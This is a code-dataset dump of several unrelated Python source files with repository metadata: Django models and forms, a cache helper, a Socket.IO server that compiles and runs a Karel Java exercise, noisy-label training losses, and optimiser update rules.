blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9611fd8e79e725c836099ca0e2b297efab9883de | 2847f70cb61e57c036ebf3853f85b82350d39241 | /site_settings/models.py | 03da250c68902c7996bbe00f436698cfeac7a65c | [] | no_license | SDupZ/sdup.nz | 6f020c3f074062edf6df734ee75996a50459df42 | a84c8bcbc14e3a086c263c38630555764e0acb71 | refs/heads/master | 2021-01-20T05:13:12.960616 | 2017-06-12T10:28:22 | 2017-06-12T10:28:22 | 89,761,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | from datetime import datetime
from django.db import models
from filer.fields.image import FilerImageField
class HomepageSettings(models.Model):
    """Singleton-style settings record for the homepage (jumbotron image etc.)."""
    # Auto-managed audit timestamps; indexed for ordering/filtering in admin.
    created = models.DateTimeField(db_index=True, auto_now_add=True)
    modified = models.DateTimeField(db_index=True, auto_now=True)
    # Optional hero image, stored via django-filer.
    jumbotron_image = FilerImageField(blank=True, null=True, related_name="jumbotron_image")
    class Meta:
        verbose_name = "Homepage Settings"
| [
"smdupnz@yahoo.co.nz"
] | smdupnz@yahoo.co.nz |
fb3c8d03e35d9a16bcaa330a45d50fdb01bb1c19 | f500caaa13d7471956c04b153ea6cfc841623af6 | /homeassist/util/cache.py | 4526fa71a6e674eae6e118b5abbc3ec34a2e3e1b | [] | no_license | little-young/home-assist | 66ce97f3b573af8ac6d648a096842dc6f19d7ec5 | ab8f703b75c30e7f9bb8b70ffb1a81c7589019c5 | refs/heads/master | 2022-11-25T17:17:58.749991 | 2020-07-30T15:42:03 | 2020-07-30T15:42:03 | 278,770,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,383 | py | from time import time
from homeassist.util.error import Error
# Process-local cache storage: CACHE_MEM_DICT[db][key] -> value,
# CACHE_TIME_DICT[db][key] -> absolute expiry timestamp (or -1 = never).
CACHE_MEM_DICT = {}
CACHE_TIME_DICT = {}
def check_db(db):
    """Make sure the value/expiry dictionaries for cache *db* exist."""
    if db in CACHE_MEM_DICT:
        return
    CACHE_MEM_DICT[db] = {}
    CACHE_TIME_DICT[db] = {}
def delete(key, db=0):
    """Remove the entry stored under *key* from cache *db* (no-op if absent)."""
    check_db(db)
    store = CACHE_MEM_DICT[db]
    if key in store:
        del store[key]
        del CACHE_TIME_DICT[db][key]
    return True
def get(key, db=0):
    """Return the value stored under *key* in cache *db*, or None.

    Expired entries are evicted lazily: when an entry's deadline has
    passed, it is deleted on access and None is returned.

    Fix: the original placed the intended docstring *after* the first
    statement, where it is just a no-op string expression; it also looked
    the key/deadline up from the dicts repeatedly.
    """
    check_db(db)
    if key not in CACHE_MEM_DICT[db]:
        return None
    deadline = CACHE_TIME_DICT[db][key]
    # -1 means "never expires"; otherwise the entry is live until the
    # stored absolute timestamp.
    if deadline == -1 or deadline > time():
        return CACHE_MEM_DICT[db][key]
    delete(key, db)  # lazy eviction of the stale entry
    return None
def set(key, data, expire=-1, db=0):
    """Store *data* under *key* in cache *db*.

    :param key: cache key
    :param data: value to store
    :param expire: lifetime in seconds; -1 means the entry never expires
    :param db: cache database index
    :return: True
    """
    check_db(db)
    CACHE_MEM_DICT[db][key] = data
    # Translate the relative lifetime into an absolute deadline
    # (-1 is kept as the "never expires" sentinel).
    deadline = -1 if expire == -1 else time() + expire
    CACHE_TIME_DICT[db][key] = deadline
    return True
def update_expire_time(key, expire=-1, db=0):
    """Reset the expiry deadline of an existing cache entry.

    :param key: key that must already exist in cache *db*
    :param expire: new lifetime in seconds; -1 means never expire
    :param db: cache database index
    :raises Error: if *key* is not present in cache *db*
    :return: True
    """
    check_db(db)
    # Fix: use a membership test instead of `not ...get(key)` — the old
    # truthiness check wrongly raised for keys holding falsy values
    # (0, '', None, False) even though they exist in the cache.
    if key not in CACHE_MEM_DICT[db]:
        raise Error(f"not {key} in {db}")
    if expire == -1:
        CACHE_TIME_DICT[db][key] = -1
    else:
        CACHE_TIME_DICT[db][key] = time() + expire
    return True
| [
"xiaoyang.wang@luckincoffee.com"
] | xiaoyang.wang@luckincoffee.com |
20c4b3f39164a03f9e109ad879f4ffeb710248ed | c8103407fde3e0462ef77441f8421303ce79ebf3 | /backend/tips/__init__.py | a562431ec09ae4540dab5d178a0736c190f76175 | [
"MIT"
] | permissive | snvfyy/satia | d4f5cb991c85cbe880ec7d8872bc21eb8cb4ed76 | 5142046345b99d595aa49d3bbf79f1619abf5591 | refs/heads/master | 2022-05-02T03:51:32.234579 | 2018-10-24T17:55:21 | 2018-10-24T17:55:21 | 153,897,419 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | def load_fire_tips():
fire_tips = []
with open("./tips/fire_tips", "r") as f:
for line in f.readlines():
fire_tips.append(line)
return fire_tips
| [
"vlad.sabi18@gmail.com"
] | vlad.sabi18@gmail.com |
b44921c2444b6b4af3d4aedf5fafaa97c2468da0 | 0666f52326b56aadf6c3e63bcd7e5c5adf8f4cd2 | /cs106a-hw1-karel2/server.py | 13915f312d905d407646730238cab1bf74b99bbc | [] | no_license | aashidham/benuku_code_sample | 19b62aaf181801a30bf7fad6c8da8158bb1702f7 | ec84ceddade22ee9c72d7896a9b909e531a1ea40 | refs/heads/master | 2020-07-04T11:56:17.271419 | 2016-08-17T21:38:30 | 2016-08-17T21:38:30 | 65,943,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | from werkzeug.wrappers import Response, Request
from werkzeug.serving import run_simple
import eventlet, socketio
import posixpath, urllib, os, mimetypes, json, sqlite3, signal, subprocess
from operator import attrgetter
import time, subprocess
# Handle to the most recently launched `java ... AnythingGoes` child
# process, so a new /run request can terminate the previous instance.
proc = None
# Socket.IO server; the WSGI app is wrapped with it in the __main__ guard.
sio = socketio.Server()
@sio.on('connect')
def connect(sid, environ):
    # Trace every new Socket.IO connection by its session id.
    print("connect ", sid)
@sio.on('chat message')
def message(sid, data):
    """Relay a chat message from one client to all connected clients."""
    # Fix: the original used a Python 2 print statement
    # (`print "hey there"`), a SyntaxError on Python 3; the
    # parenthesised form prints the same text on both versions.
    print("hey there")
    print("message ", data)
    # No `room` argument: broadcast to every connected client.
    sio.emit('chat message', data)
@sio.on('disconnect')
def disconnect(sid):
    # Trace client disconnects by session id.
    print('disconnect ', sid)
def translate_path(path):
    """Map a URL path to a filesystem path under the current working dir.

    Mirrors SimpleHTTPServer's translate_path: strips the query string
    and fragment, URL-decodes, normalises, then rebuilds the path one
    component at a time so `..` segments cannot escape os.getcwd().
    """
    # abandon query parameters
    path = path.split('?',1)[0]
    path = path.split('#',1)[0]
    # NOTE(review): urllib.unquote exists only on Python 2; on Python 3
    # this needs urllib.parse.unquote — confirm the intended runtime.
    path = posixpath.normpath(urllib.unquote(path))
    words = path.split('/')
    words = filter(None, words)  # drop empty segments from '//' or a leading '/'
    path = os.getcwd()
    for word in words:
        # Strip any drive letter / directory prefix a client could smuggle in.
        drive, word = os.path.splitdrive(word)
        head, word = os.path.split(word)
        if word in (os.curdir, os.pardir): continue  # ignore '.' and '..'
        path = os.path.join(path, word)
    return path
def application(environ, start_response):
    """WSGI entry point: serves static files plus a small JSON API
    (/fileopen, /filewrite, /run) for editing and running a Karel program.
    """
    request = Request(environ)
    path = translate_path(request.path)
    try:
        # NOTE(review): Python 2 print statement — SyntaxError on Python 3.
        print "opeining path",path
        f = open(path,'rb')
    except IOError:
        # The path is not a readable file; treat it as an API endpoint.
        if "fileopen" in request.path:
            # Return the current contents of the Java source as JSON.
            f2 = open("src/AnythingGoes.java")
            inp_text = f2.read()
            f2.close()
            response = Response(json.dumps({"data":inp_text}), mimetype="application/json")
            return response(environ, start_response)
        if "filewrite" in request.path:
            # Overwrite the Java source with the posted "data" field.
            inp_text = request.form["data"]
            f2 = open("src/AnythingGoes.java", 'w')
            f2.write(inp_text)
            f2.close()
            response = Response(json.dumps({"status":"success"}), mimetype="application/json")
            return response(environ, start_response)
        if "run" in request.path:
            global proc
            if proc:
                # Kill the entire process group of the previous run
                # (the child was started with its own session, see below).
                os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
            #inp_text = request.form["data"]
            #f2 = open("src/AnythingGoes.java", 'w')
            #f2.write(inp_text)
            #f2.close()
            # Compile the sources.  shell=True is tolerable here only
            # because the command is a fixed string with no user input.
            out, err = subprocess.Popen("javac -d bin/ -cp lib/karel.jar:bin/:src/ src/*", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
            if len(err):
                # Compiler errors are reported back to the client verbatim.
                response = Response(json.dumps({"status":"error","data":err}), mimetype="application/json")
                return response(environ, start_response)
            # Launch the compiled program against X display :5555 in its
            # own session/process group so it can be killed on the next /run.
            proc = subprocess.Popen("DISPLAY=:5555 java -cp lib/karel.jar:bin/ AnythingGoes &", shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            response = Response(json.dumps({"status":"success"}), mimetype="application/json")
            return response(environ, start_response)
        # if not, 404 this sucker
        response = Response()
        response.status_code = 404
        return response(environ, start_response)
    # Regular static file: serve it with a guessed MIME type.
    response = Response(f.read(), mimetype=mimetypes.guess_type(request.path)[0])
    return response(environ, start_response)
if __name__ == '__main__':
    # Wrap the WSGI app with the Socket.IO middleware and serve on port 80
    # (binding to 80 requires root / CAP_NET_BIND_SERVICE).
    application = socketio.Middleware(sio, application)
    eventlet.wsgi.server(eventlet.listen(('', 80)), application)
    #run_simple('0.0.0.0', 80, application, use_debugger=True, use_reloader=True)
| [
"aashidham@gmail.com"
] | aashidham@gmail.com |
ab203dead3895fbe4a0ffe442a2e8d8ab56f1073 | 65ca2789de0a95a7371454a22d8f76256669eafc | /loss.py | aed0aa0f430b6db6a86e037c11639a873cf6f4f4 | [] | no_license | yyy11178/CRSSC | 0f5c1c7414068b40d301f1c60db5844788bc5643 | 97c2f217f3cf5b1af1e20e807c6bc6ee50342a88 | refs/heads/master | 2022-03-03T23:16:20.264106 | 2019-11-15T06:01:04 | 2019-11-15T06:01:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,852 | py | # -*- coding: utf-8 -*-
import torch
import torch.nn.functional as F
from utils.utils import print_to_logfile
# Fix the CPU and (all) GPU RNG seeds at import time so runs are reproducible.
torch.manual_seed(0)
torch.cuda.manual_seed(0)
torch.cuda.manual_seed_all(0)
def std_loss(logits, labels, indices, T_k, epoch, memory_pool, eps=0.1):
    """Sample-selection loss for training with noisy labels.

    For the first T_k epochs every sample contributes a label-smoothed CE
    loss.  Afterwards each batch is split by loss: samples below the batch
    mean are kept as "clean"; among the high-loss rest, samples with a
    high softmax std (confident prediction) are treated as mislabeled and
    relabeled from *memory_pool*, while the remainder are dropped as
    irrelevant.  Selection statistics are appended to a per-epoch CSV.

    Returns (losses over the selected samples, per-sample CE losses).
    """
    ce_losses = label_smoothing_cross_entropy(logits, labels, epsilon=eps, reduction='none')
    # in the first T_k epochs, train with the entire training set
    if epoch < T_k:
        # print('using naive CE', end=' <--- ')
        return ce_losses, ce_losses
    # after T_k epochs, start dividing training set into clean / uncertain / irrelevant
    ind_loss_sorted = torch.argsort(ce_losses.data)
    # "clean" = number of samples whose loss is below the batch mean
    num_remember = torch.nonzero(ce_losses < ce_losses.mean()).shape[0]
    # print(' ---> {:2d}'.format(num_remember), end=', ')
    stats_log_path = 'stats/drop_n_reuse_stats_epoch{:03d}.csv'.format(epoch+1)
    print_to_logfile(stats_log_path, '{:03d}'.format(num_remember), init=False, end=',')
    ind_clean = ind_loss_sorted[:num_remember]
    ind_forget = ind_loss_sorted[num_remember:]
    logits_clean = logits[ind_clean]
    labels_clean = labels[ind_clean]
    if ind_forget.shape[0] > 1:
        # for samples with high loss
        # high loss, high std --> mislabeling
        # high loss, low std --> irrelevant category
        indices_forget = indices[ind_forget]
        logits_forget = logits[ind_forget]
        pred_distribution = F.softmax(logits_forget, dim=1)
        batch_std = pred_distribution.std(dim=1)
        # Threshold = mean softmax std of the clean samples.
        flag = F.softmax(logits_clean, dim=1).std(dim=1).mean().item()
        # print('{:.5f}'.format(flag), end='*****')
        batch_std_sorted, ind_std_sorted = torch.sort(batch_std.data, descending=True)
        ind_split = split_set(batch_std_sorted, flag)
        if ind_split is None:
            ind_split = -1  # nothing qualifies as "uncertain"
        # print('{} == {}'.format(batch_std_sorted, ind_split), end=' ---> ')
        # uncertain could be either mislabeled or hard example
        ind_uncertain = ind_std_sorted[:(ind_split+1)]
        # print('{:2d}/{:2d}'.format(ind_split+1, logits.shape[0] - num_remember), end=' <--- ')
        print_to_logfile(stats_log_path,
                         '{:03d},{:03d}'.format(ind_split+1, logits.shape[0] - num_remember - ind_split - 1),
                         init=False, end='\n')
        logits_mislabeled = logits_forget[ind_uncertain]
        indices_mislabeled = indices_forget[ind_uncertain]
        # Replace noisy labels with the most probable labels remembered
        # by the memory pool for those sample indices.
        labels_mislabeled = memory_pool.most_prob_labels[indices_mislabeled].to(logits_mislabeled.device)
        logits_final = torch.cat((logits_clean, logits_mislabeled), dim=0)
        labels_final = torch.cat((labels_clean, labels_mislabeled), dim=0)
    else:
        # print('{:2d}/{:2d}'.format(0, logits.shape[0] - num_remember), end=' <--- ')
        print_to_logfile(stats_log_path, '{:03d},{:03d}'.format(0, logits.shape[0] - num_remember), init=False, end='\n')
        logits_final = logits_clean
        labels_final = labels_clean
    std_losses = label_smoothing_cross_entropy(logits_final, labels_final, epsilon=eps, reduction='none')
    return std_losses, ce_losses
def split_set(x, flag):
    """Locate the split point of a descending-sorted 1-D tensor.

    Returns the index of the element just before the first entry that
    drops below *flag* (so -1 when even the first entry is below it),
    or None when *x* has a single element or nothing falls below *flag*.
    All entries of *x* are expected to be positive.
    """
    assert (x > 0).all()
    if x.shape[0] == 1:
        return None
    below_flag = (x < flag).nonzero()
    if below_flag.shape[0] == 0:
        return None
    first_below = below_flag[0, 0]
    return first_below - 1
def label_smoothing_cross_entropy(logit, label, epsilon=0.1, reduction='none'):
    """Cross entropy against a label-smoothed target distribution.

    The true class gets probability 1 - epsilon; the remaining epsilon is
    spread uniformly over the other C - 1 classes.

    :param logit: (N, C) unnormalised class scores
    :param label: (N,) integer class indices
    :param epsilon: probability mass moved off the true class
    :param reduction: 'none' -> (N,) losses; 'mean' / 'sum' -> scalar
    """
    num_samples = label.size(0)
    num_classes = logit.size(1)
    off_value = epsilon / (num_classes - 1)
    # Build the smoothed target on CPU, then move it if the logits live on GPU.
    target = torch.full((num_samples, num_classes), off_value)
    target.scatter_(dim=1, index=label.unsqueeze(1).cpu(), value=1 - epsilon)
    if logit.is_cuda:
        target = target.cuda()
    losses = -(F.log_softmax(logit, dim=1) * target).sum(dim=1)  # (N,)
    if reduction == 'none':
        return losses
    if reduction == 'mean':
        return losses.sum() / num_samples
    if reduction == 'sum':
        return losses.sum()
    raise AssertionError('reduction has to be none, mean or sum')
def cot_std_loss(logits1, logits2, labels, indices, T_k, epoch, memory_pool1, memory_pool2, eps=0.1):
    """Co-teaching variant of std_loss for two networks trained jointly.

    For the first T_k epochs both networks train on every sample with
    label-smoothed CE.  Afterwards each network splits the batch by its
    own loss into clean / forgotten sets; in co-teaching fashion, each
    network is then trained on the *other* network's clean selection.
    High-loss samples whose softmax std exceeds the clean-sample average
    are treated as mislabeled and fed to the peer network with labels
    taken from the peer's memory pool.  Selection statistics are appended
    to per-network, per-epoch CSV files.

    Returns (selected losses net1, CE losses net1,
             selected losses net2, CE losses net2).
    """
    ce_losses1 = label_smoothing_cross_entropy(logits1, labels, epsilon=eps, reduction='none')  # (N,)
    ce_losses2 = label_smoothing_cross_entropy(logits2, labels, epsilon=eps, reduction='none')  # (N,)
    # in the first T_k epochs, train with the entire training set
    if epoch < T_k:
        # print('using naive CE', end=' <--- ')
        return ce_losses1, ce_losses1, ce_losses2, ce_losses2
    # after T_k epochs, start dividing training set into clean / uncertain / irrelevant
    ind_loss_sorted1 = torch.argsort(ce_losses1.data)
    ind_loss_sorted2 = torch.argsort(ce_losses2.data)
    # "clean" = samples whose loss is below that network's batch mean.
    num_remember1 = torch.nonzero(ce_losses1 < ce_losses1.mean()).shape[0]
    num_remember2 = torch.nonzero(ce_losses2 < ce_losses2.mean()).shape[0]
    # print(' ---> {:2d}, {:2d}'.format(num_remember1, num_remember1), end=', ')
    stats_log_path1 = 'stats/net1_drop_n_reuse_stats_epoch{:03d}.csv'.format(epoch + 1)
    stats_log_path2 = 'stats/net2_drop_n_reuse_stats_epoch{:03d}.csv'.format(epoch + 1)
    print_to_logfile(stats_log_path1, '{:03d}'.format(num_remember1), init=False, end=',')
    print_to_logfile(stats_log_path2, '{:03d}'.format(num_remember2), init=False, end=',')
    ind_clean1 = ind_loss_sorted1[:num_remember1]
    ind_clean2 = ind_loss_sorted2[:num_remember2]
    ind_forget1 = ind_loss_sorted1[num_remember1:]
    ind_forget2 = ind_loss_sorted2[num_remember2:]
    # Cross-selection: each network trains on the peer's clean samples.
    logits_clean1 = logits1[ind_clean2]
    logits_clean2 = logits2[ind_clean1]
    labels_clean1 = labels[ind_clean2]
    labels_clean2 = labels[ind_clean1]
    logits_final1 = logits_clean1
    logits_final2 = logits_clean2
    labels_final1 = labels_clean1
    labels_final2 = labels_clean2
    if ind_forget1.shape[0] > 1:
        # for samples with high loss
        # high loss, high std --> mislabeling
        # high loss, low std --> irrelevant category
        # indices_forget1 = indices[ind_forget1]
        logits_forget1 = logits1[ind_forget1]
        pred_distribution1 = F.softmax(logits_forget1, dim=1)
        batch_std1 = pred_distribution1.std(dim=1)
        # Threshold = mean softmax std of net1's clean selection.
        flag1 = F.softmax(logits_clean1, dim=1).std(dim=1).mean().item()
        # print('{:.5f}'.format(flag), end='*****')
        batch_std_sorted1, ind_std_sorted1 = torch.sort(batch_std1.data, descending=True)
        ind_split1 = split_set(batch_std_sorted1, flag1)
        if ind_split1 is None:
            ind_split1 = -1  # nothing qualifies as "uncertain"
        # print('{} == {}'.format(batch_std_sorted, ind_split), end=' ---> ')
        # uncertain could be either mislabeled or hard example
        ind_uncertain1 = ind_std_sorted1[:(ind_split1 + 1)]
        # print('{:2d}/{:2d}'.format(ind_split1 + 1, logits1.shape[0] - num_remember1), end=' <--- ')
        print_to_logfile(stats_log_path1,
                         '{:03d},{:03d}'.format(ind_split1+1, logits1.shape[0] - num_remember1 - ind_split1 - 1))
        # Samples net1 flags as mislabeled are handed to net2 with the
        # labels remembered by net2's memory pool.
        ind_mislabeled1 = ind_forget1[ind_uncertain1]
        logits_mislabeled2 = logits2[ind_mislabeled1]
        indices_mislabeled2 = indices[ind_mislabeled1]
        labels_mislabeled2 = memory_pool2.most_prob_labels[indices_mislabeled2].to(logits_mislabeled2.device)
        logits_final2 = torch.cat((logits_final2, logits_mislabeled2), dim=0)
        labels_final2 = torch.cat((labels_final2, labels_mislabeled2), dim=0)
    if ind_forget2.shape[0] > 1:
        # for samples with high loss
        # high loss, high std --> mislabeling
        # high loss, low std --> irrelevant category
        # indices_forget2 = indices[ind_forget2]
        logits_forget2 = logits2[ind_forget2]
        pred_distribution2 = F.softmax(logits_forget2, dim=1)
        batch_std2 = pred_distribution2.std(dim=1)
        # Threshold = mean softmax std of net2's clean selection.
        flag2 = F.softmax(logits_clean2, dim=1).std(dim=1).mean().item()
        # print('{:.5f}'.format(flag), end='*****')
        batch_std_sorted2, ind_std_sorted2 = torch.sort(batch_std2.data, descending=True)
        ind_split2 = split_set(batch_std_sorted2, flag2)
        if ind_split2 is None:
            ind_split2 = -1  # nothing qualifies as "uncertain"
        # print('{} == {}'.format(batch_std_sorted, ind_split), end=' ---> ')
        # uncertain could be either mislabeled or hard example
        ind_uncertain2 = ind_std_sorted2[:(ind_split2 + 1)]
        # print('{:2d}/{:2d}'.format(ind_split2 + 1, logits2.shape[0] - num_remember2), end=' <--- ')
        print_to_logfile(stats_log_path2,
                         '{:03d},{:03d}'.format(ind_split2+1, logits2.shape[0] - num_remember2 - ind_split2 - 1))
        # Samples net2 flags as mislabeled are handed to net1 with the
        # labels remembered by net1's memory pool.
        ind_mislabeled2 = ind_forget2[ind_uncertain2]
        logits_mislabeled1 = logits1[ind_mislabeled2]
        indices_mislabeled1 = indices[ind_mislabeled2]
        labels_mislabeled1 = memory_pool1.most_prob_labels[indices_mislabeled1].to(logits_mislabeled1.device)
        logits_final1 = torch.cat((logits_final1, logits_mislabeled1), dim=0)
        labels_final1 = torch.cat((labels_final1, labels_mislabeled1), dim=0)
    else:
        # print('{:2d}/{:2d}, {:2d}/{:2d}'.format(0, logits1.shape[0] - num_remember1,
        #                                         0, logits2.shape[0] - num_remember2), end=' <--- ')
        # NOTE(review): this `else` pairs only with the second `if`, so the
        # zero-count stats for net1 are logged here even when net1's branch
        # ran — confirm whether that is intended.
        print_to_logfile(stats_log_path1, '{:03d},{:03d}'.format(0, logits1.shape[0] - num_remember1))
        print_to_logfile(stats_log_path2, '{:03d},{:03d}'.format(0, logits2.shape[0] - num_remember2))
    losses1 = label_smoothing_cross_entropy(logits_final1, labels_final1, epsilon=eps, reduction='none')
    losses2 = label_smoothing_cross_entropy(logits_final2, labels_final2, epsilon=eps, reduction='none')
    return losses1, ce_losses1, losses2, ce_losses2
| [
"fg_nust_3@163.com"
] | fg_nust_3@163.com |
91ffcd83defc9e9403a8e76012c3754f335db4fa | 8661aca3cd633d3f50cfd19d4d5e2c864ca5e71c | /Ex009.py | fa77ecda8d0ce94d40879d21b8736c706e3499a1 | [] | no_license | hianp/Exercicios_Curso_em_video_Py | 043cfba7e7fb558a6f4d972acd5367c9f15718e2 | 51a3e71504bb8db6debd0fa7992b929d712f4b2f | refs/heads/main | 2023-03-21T14:20:43.509963 | 2021-03-10T23:47:01 | 2021-03-10T23:47:01 | 335,655,362 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | n = int(input('Digite um número: '))
print('A tabuada do número {} é:'.format(n))
# The original repeated one print statement per product; a loop over
# 1..10 produces byte-identical output with a single template.
for i in range(1, 11):
    print('{} x {} = {}'.format(n, i, n * i))
| [
"noreply@github.com"
] | hianp.noreply@github.com |
c4149668fc54104349962cc2f172eb9e34b861d5 | 2b45da1be780556426e707da7fa73756cea02ba5 | /main_app/migrations/0002_auto_20210203_0736.py | bf9af9023dd9521919d04226bd38535e1daeda50 | [] | no_license | abonilla1/offThePace | 7e350efc22ad5ba1531bb8c7085d1f08bb9a6e8d | d3debd4ef6703919b7cddfd5e102d9b3decac413 | refs/heads/main | 2023-03-10T21:41:34.665850 | 2021-02-10T11:31:02 | 2021-02-10T11:31:02 | 335,526,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py | # Generated by Django 3.1.6 on 2021-02-03 07:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: create the Race model and link Horse to it."""
    # Must be applied after the app's initial migration.
    dependencies = [
        ('main_app', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Race',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('host_track', models.CharField(max_length=200)),
                ('city', models.CharField(max_length=200)),
                ('field_size', models.IntegerField()),
                ('grade', models.CharField(choices=[('G1', 'GRADE ONE'), ('G2', 'GRADE TWO'), ('G3', 'GRADE THREE')], max_length=2)),
                ('distance', models.CharField(max_length=200)),
                ('race_date', models.DateField()),
                ('entries', models.TextField(max_length=500)),
            ],
        ),
        # Every Horse row gains a required link to a Race; deleting the
        # Race cascades to its horses.
        migrations.AddField(
            model_name='horse',
            name='race',
            field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, to='main_app.race'),
        ),
    ]
| [
"amariabrown015@gmail.com"
] | amariabrown015@gmail.com |
76773f8a01b7a8807b6f82164ffad3f9efad41d6 | 6dd08121190d58eb9c934c6f631768fa1b56f7b2 | /assignment2/cs231n/optim.py | dae457a240b33995d83e7e227d66443cfd9287ba | [] | no_license | naineshhulke/CS231n-2019-Assignments | 414460d509d67af2b17cdb83fbb2413a8d187142 | 1f0c0120c87bdf0439c50249bcc4de3c01aba4a9 | refs/heads/master | 2022-12-11T11:10:54.769042 | 2019-10-22T11:18:35 | 2019-10-22T11:18:35 | 185,601,578 | 0 | 1 | null | 2022-12-08T05:17:51 | 2019-05-08T12:27:38 | Jupyter Notebook | UTF-8 | Python | false | false | 6,649 | py | import numpy as np
"""
This file implements various first-order update rules that are commonly used
for training neural networks. Each update rule accepts current weights and the
gradient of the loss with respect to those weights and produces the next set of
weights. Each update rule has the same interface:
def update(w, dw, config=None):
Inputs:
- w: A numpy array giving the current weights.
- dw: A numpy array of the same shape as w giving the gradient of the
loss with respect to w.
- config: A dictionary containing hyperparameter values such as learning
rate, momentum, etc. If the update rule requires caching values over many
iterations, then config will also hold these cached values.
Returns:
- next_w: The next point after the update.
- config: The config dictionary to be passed to the next iteration of the
update rule.
NOTE: For most update rules, the default learning rate will probably not
perform well; however the default values of the other hyperparameters should
work well for a variety of different problems.
For efficiency, update rules may perform in-place updates, mutating w and
setting next_w equal to w.
"""
def sgd(w, dw, config=None):
    """
    Performs vanilla stochastic gradient descent.

    config format:
    - learning_rate: Scalar learning rate.
    """
    if config is None:
        config = {}
    # setdefault both installs the default and hands back the active value.
    lr = config.setdefault('learning_rate', 1e-2)
    w -= lr * dw  # in-place step, like the original
    return w, config
def sgd_momentum(w, dw, config=None):
    """
    Performs stochastic gradient descent with momentum.

    config format:
    - learning_rate: Scalar learning rate.
    - momentum: Scalar between 0 and 1 giving the momentum value.
      Setting momentum = 0 reduces to sgd.
    - velocity: A numpy array of the same shape as w and dw used to store a
      moving average of the gradients.
    """
    if config is None:
        config = {}
    config.setdefault('learning_rate', 1e-2)
    config.setdefault('momentum', 0.9)
    velocity = config.get('velocity', np.zeros_like(w))
    # Decay the running velocity, then fold in the current gradient step.
    velocity = config['momentum'] * velocity - config['learning_rate'] * dw
    next_w = w + velocity
    config['velocity'] = velocity
    return next_w, config
def rmsprop(w, dw, config=None):
    """
    Uses the RMSProp update rule, which uses a moving average of squared
    gradient values to set adaptive per-parameter learning rates.

    config format:
    - learning_rate: Scalar learning rate.
    - decay_rate: Scalar between 0 and 1 giving the decay rate for the squared
      gradient cache.
    - epsilon: Small scalar used for smoothing to avoid dividing by zero.
    - cache: Moving average of second moments of gradients.
    """
    if config is None:
        config = {}
    config.setdefault('learning_rate', 1e-2)
    config.setdefault('decay_rate', 0.99)
    config.setdefault('epsilon', 1e-8)
    config.setdefault('cache', np.zeros_like(w))
    decay = config['decay_rate']
    # Exponential moving average of squared gradients.
    cache = decay * config['cache'] + (1 - decay) * dw * dw
    next_w = w - config['learning_rate'] * dw / (config['epsilon'] + np.sqrt(cache))
    config['cache'] = cache
    return next_w, config
def adam(w, dw, config=None):
    """
    Uses the Adam update rule, which incorporates moving averages of both the
    gradient and its square and a bias correction term.

    config format:
    - learning_rate: Scalar learning rate.
    - beta1: Decay rate for moving average of first moment of gradient.
    - beta2: Decay rate for moving average of second moment of gradient.
    - epsilon: Small scalar used for smoothing to avoid dividing by zero.
    - m: Moving average of gradient.
    - v: Moving average of squared gradient.
    - t: Iteration number.
    """
    if config is None:
        config = {}
    learning_rate = config.setdefault('learning_rate', 1e-3)
    beta1 = config.setdefault('beta1', 0.9)
    beta2 = config.setdefault('beta2', 0.999)
    eps = config.setdefault('epsilon', 1e-8)
    m = config.setdefault('m', np.zeros_like(w))
    v = config.setdefault('v', np.zeros_like(w))
    # Advance the step counter before the update (matches the original).
    t = config.setdefault('t', 1) + 1
    # First and second moment estimates with bias correction.
    m = beta1 * m + (1 - beta1) * dw
    v = beta2 * v + (1 - beta2) * dw ** 2
    m_hat = m / (1 - beta1 ** t)
    v_hat = v / (1 - beta2 ** t)
    next_w = w - learning_rate * m_hat / (np.sqrt(v_hat) + eps)
    config['t'] = t
    config['m'] = m
    config['v'] = v
    return next_w, config
| [
"thenainesh@gmail.com"
] | thenainesh@gmail.com |
4d271fa9f696c201b66ded9d03285d14b12361db | 178a2253f431bc580b4d913ce25e229e1d4570f3 | /users/forms.py | 59a158eeedc57db18e58e66f02d82b64e376266f | [] | no_license | 2501070055/jinciAPP | 39340dd761f2af6330eecb3ceb289b0cb8c1774f | 24eacd74f803e8769fbaeffe97a5950b4dc093b1 | refs/heads/main | 2023-07-16T01:12:16.385701 | 2021-08-31T02:28:26 | 2021-08-31T02:28:26 | 401,547,000 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,575 | py | import datetime
import logging
import random
import re
from django import forms
from django.contrib.auth import login, authenticate
from django.core.cache import cache
from django.db import transaction
from django.utils.timezone import now
from users.choices import SexChoices
from users.models import User, UserInfo
logs = logging.getLogger('log')
class RegisterForm(forms.Form):
    """
    User registration form: validates email/nickname uniqueness and
    creates the User + UserInfo pair, then logs the new user in.
    """
